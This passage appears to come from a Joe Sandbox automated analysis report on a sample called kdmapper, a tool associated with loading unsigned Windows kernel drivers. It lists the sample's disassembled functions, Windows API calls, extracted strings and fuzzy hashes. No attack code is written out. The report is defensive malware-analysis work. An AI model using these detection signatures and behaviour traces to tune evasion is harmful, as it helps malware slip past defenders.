                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FeaturePresentProcessor
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2325560087-0
                                                                                                                                                                          • Opcode ID: 11ccb593372ad40f5b3da1cb4239883c845db17b24d701d6eb9def60a4f12f2a
                                                                                                                                                                          • Instruction ID: 8c1b1434556834df55901444420cab120dfde90e932fc5cf70b9a854c95fd4ec
                                                                                                                                                                          • Opcode Fuzzy Hash: 11ccb593372ad40f5b3da1cb4239883c845db17b24d701d6eb9def60a4f12f2a
                                                                                                                                                                          • Instruction Fuzzy Hash: 1B517FB1D006199FEB28CF54E9857AABBF6FB48314F24953AD411EB350D375E901CB90
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetVersionExW.KERNEL32(?), ref: 0062B16B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Version
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1889659487-0
                                                                                                                                                                          • Opcode ID: 612fc00cf9a775b5183cb394a8ca5be26bf010af795b993af5948b327b50239f
                                                                                                                                                                          • Instruction ID: c539629fbd3ff4be7831453a0f3eb5536b672317be74bf19a8cc705675f0fc3c
                                                                                                                                                                          • Opcode Fuzzy Hash: 612fc00cf9a775b5183cb394a8ca5be26bf010af795b993af5948b327b50239f
                                                                                                                                                                          • Instruction Fuzzy Hash: 25F09AB4E006588FCF18CF18EC966DA33F3FB99305F145295D50693390C7B0AA84CE61
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 00626FAA
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00627013
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00627084
                                                                                                                                                                            • Part of subcall function 00627A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00627AAB
                                                                                                                                                                            • Part of subcall function 00627A9C: GetLastError.KERNEL32 ref: 00627AF1
                                                                                                                                                                            • Part of subcall function 00627A9C: CloseHandle.KERNEL32(?), ref: 00627B00
                                                                                                                                                                            • Part of subcall function 0062A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0062977F,?,?,006295CF,?,?,?,?,?,00652641,000000FF), ref: 0062A1F1
                                                                                                                                                                            • Part of subcall function 0062A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0062977F,?,?,006295CF,?,?,?,?,?,00652641), ref: 0062A21F
                                                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00627139
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00627155
                                                                                                                                                                          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00627298
                                                                                                                                                                            • Part of subcall function 00629DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,006273BC,?,?,?,00000000), ref: 00629DBC
                                                                                                                                                                            • Part of subcall function 00629DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00629E70
                                                                                                                                                                            • Part of subcall function 00629620: CloseHandle.KERNELBASE(000000FF,?,?,006295D6,?,?,?,?,?,00652641,000000FF), ref: 0062963B
                                                                                                                                                                            • Part of subcall function 0062A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0062A325,?,?,?,0062A175,?,00000001,00000000,?,?), ref: 0062A501
                                                                                                                                                                            • Part of subcall function 0062A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0062A325,?,?,?,0062A175,?,00000001,00000000,?,?), ref: 0062A532
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                                                                                                                          • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                                                          • API String ID: 3983180755-3508440684
                                                                                                                                                                          • Opcode ID: 37d95ba8b9724fef7314348083656c59c0c4867a0ff4a34b832b9e04b191824a
                                                                                                                                                                          • Instruction ID: e154ae7a7655d2e0f53941fba149a760ad844c76af297a00a249daca52b0d861
                                                                                                                                                                          • Opcode Fuzzy Hash: 37d95ba8b9724fef7314348083656c59c0c4867a0ff4a34b832b9e04b191824a
                                                                                                                                                                          • Instruction Fuzzy Hash: 07C12771904B24ABDB21DB70EC41FEEB3AAAF08300F00455EF956E7282D730AA44CF65
                                                                                                                                                                          APIs
                                                                                                                                                                          • _swprintf.LIBCMT ref: 0062E30E
                                                                                                                                                                            • Part of subcall function 00624092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006240A5
                                                                                                                                                                            • Part of subcall function 00631DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00661030,00000200,0062D928,00000000,?,00000050,00661030), ref: 00631DC4
                                                                                                                                                                          • _strlen.LIBCMT ref: 0062E32F
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,0065E274,?), ref: 0062E38F
                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0062E3C9
                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0062E3D5
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0062E475
                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0062E4A2
                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 0062E4DB
                                                                                                                                                                          • GetSystemMetrics.USER32(00000008), ref: 0062E4E3
                                                                                                                                                                          • GetWindow.USER32(?,00000005), ref: 0062E4EE
                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0062E51B
                                                                                                                                                                          • GetWindow.USER32(00000000,00000002), ref: 0062E58D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                                                                                                          • String ID: $%s:$CAPTION$d$te
                                                                                                                                                                          • API String ID: 2407758923-4090530616
                                                                                                                                                                          • Opcode ID: 66038aa8e120fb57ce5d0a825d05495298d251bb30981d543167be83c673d786
                                                                                                                                                                          • Instruction ID: 903b0f0c7fc8172af7f49dc165177b169aa44d538d2a3682333167beba81db07
                                                                                                                                                                          • Opcode Fuzzy Hash: 66038aa8e120fb57ce5d0a825d05495298d251bb30981d543167be83c673d786
                                                                                                                                                                          • Instruction Fuzzy Hash: CE819272108311AFD710DF68DD89A6FBBEAEB88B04F04492DFA84E7350D675E9058B52
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 0064CB66
                                                                                                                                                                            • Part of subcall function 0064C701: _free.LIBCMT ref: 0064C71E
                                                                                                                                                                            • Part of subcall function 0064C701: _free.LIBCMT ref: 0064C730
                                                                                                                                                                            • Part of subcall function 0064C701: _free.LIBCMT ref: 0064C742
                                                                                                                                                                            • Part of subcall function 0064C701: _free.LIBCMT ref: 0064C754
                                                                                                                                                                            • Part of subcall function 0064C701: _free.LIBCMT ref: 0064C766
                                                                                                                                                                            • Part of subcall function 0064C701: _free.LIBCMT ref: 0064C778
                                                                                                                                                                            • Part of subcall function 0064C701: _free.LIBCMT ref: 0064C78A
                                                                                                                                                                            • Part of subcall function 0064C701: _free.LIBCMT ref: 0064C79C
                                                                                                                                                                            • Part of subcall function 0064C701: _free.LIBCMT ref: 0064C7AE
                                                                                                                                                                            • Part of subcall function 0064C701: _free.LIBCMT ref: 0064C7C0
                                                                                                                                                                            • Part of subcall function 0064C701: _free.LIBCMT ref: 0064C7D2
                                                                                                                                                                            • Part of subcall function 0064C701: _free.LIBCMT ref: 0064C7E4
                                                                                                                                                                            • Part of subcall function 0064C701: _free.LIBCMT ref: 0064C7F6
                                                                                                                                                                          • _free.LIBCMT ref: 0064CB5B
                                                                                                                                                                            • Part of subcall function 00648DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0064C896,00653A34,00000000,00653A34,00000000,?,0064C8BD,00653A34,00000007,00653A34,?,0064CCBA,00653A34), ref: 00648DE2
                                                                                                                                                                            • Part of subcall function 00648DCC: GetLastError.KERNEL32(00653A34,?,0064C896,00653A34,00000000,00653A34,00000000,?,0064C8BD,00653A34,00000007,00653A34,?,0064CCBA,00653A34,00653A34), ref: 00648DF4
                                                                                                                                                                          • _free.LIBCMT ref: 0064CB7D
                                                                                                                                                                          • _free.LIBCMT ref: 0064CB92
                                                                                                                                                                          • _free.LIBCMT ref: 0064CB9D
                                                                                                                                                                          • _free.LIBCMT ref: 0064CBBF
                                                                                                                                                                          • _free.LIBCMT ref: 0064CBD2
                                                                                                                                                                          • _free.LIBCMT ref: 0064CBE0
                                                                                                                                                                          • _free.LIBCMT ref: 0064CBEB
                                                                                                                                                                          • _free.LIBCMT ref: 0064CC23
                                                                                                                                                                          • _free.LIBCMT ref: 0064CC2A
                                                                                                                                                                          • _free.LIBCMT ref: 0064CC47
                                                                                                                                                                          • _free.LIBCMT ref: 0064CC5F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                          • String ID: he
                                                                                                                                                                          • API String ID: 161543041-1137534704
                                                                                                                                                                          • Opcode ID: 38692688310e0234c75b49d5db3c996b50f4289e7080b604ffa8e8b994d88114
                                                                                                                                                                          • Instruction ID: fba840f19669cab7f0df35c7a7daef48835c2ac55b289668841ed765677fddec
                                                                                                                                                                          • Opcode Fuzzy Hash: 38692688310e0234c75b49d5db3c996b50f4289e7080b604ffa8e8b994d88114
                                                                                                                                                                          • Instruction Fuzzy Hash: AC315031A027059FEBA1AA79D846B9A77EBEF50320F14541DE558D7392DF31EC40CB14
                                                                                                                                                                          APIs
                                                                                                                                                                          • _free.LIBCMT ref: 00649705
                                                                                                                                                                            • Part of subcall function 00648DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0064C896,00653A34,00000000,00653A34,00000000,?,0064C8BD,00653A34,00000007,00653A34,?,0064CCBA,00653A34), ref: 00648DE2
                                                                                                                                                                            • Part of subcall function 00648DCC: GetLastError.KERNEL32(00653A34,?,0064C896,00653A34,00000000,00653A34,00000000,?,0064C8BD,00653A34,00000007,00653A34,?,0064CCBA,00653A34,00653A34), ref: 00648DF4
                                                                                                                                                                          • _free.LIBCMT ref: 00649711
                                                                                                                                                                          • _free.LIBCMT ref: 0064971C
                                                                                                                                                                          • _free.LIBCMT ref: 00649727
                                                                                                                                                                          • _free.LIBCMT ref: 00649732
                                                                                                                                                                          • _free.LIBCMT ref: 0064973D
                                                                                                                                                                          • _free.LIBCMT ref: 00649748
                                                                                                                                                                          • _free.LIBCMT ref: 00649753
                                                                                                                                                                          • _free.LIBCMT ref: 0064975E
                                                                                                                                                                          • _free.LIBCMT ref: 0064976C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                          • String ID: 0de
                                                                                                                                                                          • API String ID: 776569668-3882026998
                                                                                                                                                                          • Opcode ID: 52b59a7e432db3178a8ae262a8a331157aa1d909d1786c28b480f950e767dd9b
                                                                                                                                                                          • Instruction ID: c96695097d2542b479fcd6f43f43e1d74b1b74088ceebedf82ccfd2bc3697b57
                                                                                                                                                                          • Opcode Fuzzy Hash: 52b59a7e432db3178a8ae262a8a331157aa1d909d1786c28b480f950e767dd9b
                                                                                                                                                                          • Instruction Fuzzy Hash: A411B676911109BFCB45EF94C842CDD3BB6EF14350B5154A9FA088F262DE32DE509B98
                                                                                                                                                                          APIs
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00639736
                                                                                                                                                                          • _wcslen.LIBCMT ref: 006397D6
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 006397E5
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00639806
                                                                                                                                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0063982D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                                                                                                                          • String ID: F0wnc$</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                                                                                          • API String ID: 1777411235-1887336772
                                                                                                                                                                          • Opcode ID: 50c77fd1c3e30189b37b0003898f46a90b73a18c82a5600e6828c19ac92b4827
                                                                                                                                                                          • Instruction ID: 17dcb0ba642c022e81ff504b99c1b5a664aebc000abad8fca720125b8b663771
                                                                                                                                                                          • Opcode Fuzzy Hash: 50c77fd1c3e30189b37b0003898f46a90b73a18c82a5600e6828c19ac92b4827
                                                                                                                                                                          • Instruction Fuzzy Hash: 8B314A321093117AE725AB34DC06FAF779BDF83711F15051EF402962D2EBA09A4887F9
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetWindow.USER32(?,00000005), ref: 0063D6C1
                                                                                                                                                                          • GetClassNameW.USER32(00000000,?,00000800), ref: 0063D6ED
                                                                                                                                                                            • Part of subcall function 00631FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0062C116,00000000,.exe,?,?,00000800,?,?,?,00638E3C), ref: 00631FD1
                                                                                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0063D709
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0063D720
                                                                                                                                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 0063D734
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0063D75D
                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 0063D764
                                                                                                                                                                          • GetWindow.USER32(00000000,00000002), ref: 0063D76D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                                                                                                          • String ID: STATIC
                                                                                                                                                                          • API String ID: 3820355801-1882779555
                                                                                                                                                                          • Opcode ID: 4fad4820eec9d11398b4e710ad31a46779c437f54c5b6363c1685e36f20eb15f
                                                                                                                                                                          • Instruction ID: e942c52bccd649305c446c7ea55cf40d8b5a406d62388c6c2faa65e168160fa4
                                                                                                                                                                          • Opcode Fuzzy Hash: 4fad4820eec9d11398b4e710ad31a46779c437f54c5b6363c1685e36f20eb15f
                                                                                                                                                                          • Instruction Fuzzy Hash: 221106726003207BE3216BB0EC4AFEF766FAF44B11F005214FA91A62D1DA648B0547FA
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                                          • API String ID: 322700389-393685449
                                                                                                                                                                          • Opcode ID: 12e2fe9f55861c26f59c3b1fafbf026ab2855c0d3cf35a870bed7a6a3ebc89ad
                                                                                                                                                                          • Instruction ID: 6a591a4ba9aef212867677621fc7bcbb668d86de9933a6c450419646de2fc901
                                                                                                                                                                          • Opcode Fuzzy Hash: 12e2fe9f55861c26f59c3b1fafbf026ab2855c0d3cf35a870bed7a6a3ebc89ad
                                                                                                                                                                          • Instruction Fuzzy Hash: 6DB1697180022AEFCF69DFA4C8819AEBBB7BF14310F64415AF8116B312D731EA55CB95
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog
                                                                                                                                                                          • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$nc
                                                                                                                                                                          • API String ID: 3519838083-655254800
                                                                                                                                                                          • Opcode ID: 3dedb1d38528461a1e2d5f61ab2e2ace52111f2f0909e02c70b87a91bd6c9391
                                                                                                                                                                          • Instruction ID: f8caa71a49654da12936231923d32b656f30fc9f84c8fb55a715ebc00b59abfb
                                                                                                                                                                          • Opcode Fuzzy Hash: 3dedb1d38528461a1e2d5f61ab2e2ace52111f2f0909e02c70b87a91bd6c9391
                                                                                                                                                                          • Instruction Fuzzy Hash: E8717E71A00A29AFDB15DFA4DC959AEB7BAFF48751F04015DE512A73A0CB306E02CF50
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 00626FAA
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00627013
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00627084
                                                                                                                                                                            • Part of subcall function 00627A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00627AAB
                                                                                                                                                                            • Part of subcall function 00627A9C: GetLastError.KERNEL32 ref: 00627AF1
                                                                                                                                                                            • Part of subcall function 00627A9C: CloseHandle.KERNEL32(?), ref: 00627B00
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                                                                                                          • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                                                          • API String ID: 3122303884-3508440684
                                                                                                                                                                          • Opcode ID: 457328747e78366255740207eccbefddffeceef56290aaeea9306b970e3f701d
                                                                                                                                                                          • Instruction ID: 26c115a33687aa444270498e648b43a1e90d8391b18ad1442f31495505dfc87a
                                                                                                                                                                          • Opcode Fuzzy Hash: 457328747e78366255740207eccbefddffeceef56290aaeea9306b970e3f701d
                                                                                                                                                                          • Instruction Fuzzy Hash: FE4138B1D08B64BAEF20E770BC46FEE776F9F05740F040459F945A6282D6706A488F25
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00621316: GetDlgItem.USER32(00000000,00003021), ref: 0062135A
                                                                                                                                                                            • Part of subcall function 00621316: SetWindowTextW.USER32(00000000,006535F4), ref: 00621370
                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 0063B610
                                                                                                                                                                          • SendMessageW.USER32(?,00000080,00000001,?), ref: 0063B637
                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0063B650
                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 0063B661
                                                                                                                                                                          • GetDlgItem.USER32(?,00000065), ref: 0063B66A
